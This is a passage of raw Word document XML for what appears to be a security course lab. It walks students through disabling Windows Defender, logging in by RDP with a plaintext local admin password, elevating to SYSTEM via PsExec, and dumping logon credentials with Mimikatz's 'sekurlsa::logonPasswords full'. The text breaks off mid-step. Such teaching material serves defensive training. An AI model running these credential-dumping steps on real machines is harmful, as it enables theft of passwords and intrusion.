    <w:p w14:paraId="45B6EC37" w14:textId="42351F23" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Disabling Antivirus software </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> not recommended </w:t>
      </w:r>
      <w:r w:rsidR="00091BA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>it is</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> necessary for this exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1590D745" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click on the Windows icon and enter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F2B02" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virus and Threat protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2541EDBB" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Manage settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D49D81A" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00894D23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B2F83BF" wp14:editId="78DE1205">
            <wp:extent cx="2279767" cy="730288"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="8" name="Picture 8"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79767" cy="730288"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F44DFD" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On Real Time protection but the slide to </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B60B627" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001E68AE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A664FA3" wp14:editId="420A09F0">
            <wp:extent cx="3346622" cy="1416123"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="A picture containing bird, tree,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6622" cy="1416123"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7838EECD" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the warning Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E1965" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DO NOT CLOSE the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72911952" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create a new RDP connection for CSI-TD-CLI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438552A1" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logon to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CSI-TD-CLI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBFBD6E" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.\</w:t>
      </w:r>
      <w:r w:rsidRPr="0001432C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D32817" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PiKarAlR@AlBenMo1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B5A909" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The following warning will be displayed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59229E54" w14:textId="4DDF5155" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="00A61796" w:rsidP="00A61796">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidR="008719B9" w:rsidRPr="00753D22">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="162C216B" wp14:editId="66C27A6B">
            <wp:extent cx="3106449" cy="186953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9046" cy="1877115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2020D11D" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2602FBC9" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Download the latest version of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Mimikatz </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>in the folder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> c:\tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8214FA" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="00A608B1" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="008719B9">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200519</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="286B9530" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Choose the zip version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42470829" w14:textId="1E3D5F23" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to the </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c:\Tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> folder and unzip Mimikat</w:t>
      </w:r>
      <w:r w:rsidR="00BF1E59">
        <w:t>z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10EFCD" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We need to elevate our rights and run under </w:t>
      </w:r>
      <w:r w:rsidRPr="0093339B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> account. For this we will use PsExec.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CC5C52" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in admin mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FE8F41" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Right-click on the Windows icon and choose </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows PowerShell (admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CA85CF" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Navigate to the folder </w:t>
      </w:r>
      <w:r w:rsidRPr="0093339B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\Tools\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TD11</w:t>
      </w:r>
      <w:r w:rsidRPr="0093339B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\PsExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C1DD5" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cd </w:t>
      </w:r>
      <w:r w:rsidRPr="0093339B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\Tools\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TD11</w:t>
      </w:r>
      <w:r w:rsidRPr="0093339B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\PsExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509140BB" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6D234B" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.\</w:t>
      </w:r>
      <w:r w:rsidRPr="0001432C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">psexec -s -i -d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:r w:rsidRPr="0001432C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EFDA86" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If a license pop-up appears, click </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00382191" w:rsidDel="00F909FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00382191">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F1E46" w14:textId="33778992" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This should open a new </w:t>
      </w:r>
      <w:r w:rsidR="00BF1E59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Powershell windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prompt. In this new prompt, type the following: </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="575923DE" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56BCE2C0" wp14:editId="2753C08F">
            <wp:extent cx="3761117" cy="1235596"/>
            <wp:effectExtent l="0" t="0" r="0" b="31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5841" cy="1240433"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C1DD95" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="006F64E8" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:rStyle w:val="Accentuationlgre"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F64E8">
        <w:rPr>
          <w:rStyle w:val="Accentuationlgre"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that you are now running under local system. This was possible because you originally logged on with a local administrator. Regular users cannot do this. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E601D" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C:\Tools\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Folder where Mimikatz has been unzip</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>\x64</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6D10" w:rsidDel="00CA6D10">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A2136" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\Tools\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Folder where Mimikatz has been unzip</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F8E4F0" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not use the version </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>in the folder c:\tools\td11\mimikatz\x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73C09A" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Launch </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5D06">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B09FA0" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.\mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E88222" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enter the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD5375C" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D5D06">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B97234" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="00382191" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="530EFB80" wp14:editId="00D33745">
            <wp:extent cx="5943600" cy="1278424"/>
            <wp:effectExtent l="0" t="0" r="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278424"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="305F0E0E" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="00D35748" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AB0EC5" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D3121">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sekurlsa::logonPasswords full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426273AF" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="00265D36" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidRPr="00643763">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41FBF668" wp14:editId="7A28D14A">
            <wp:extent cx="5943600" cy="2286085"/>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86085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FCCB6D" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the output search for the </w:t>
      </w:r>
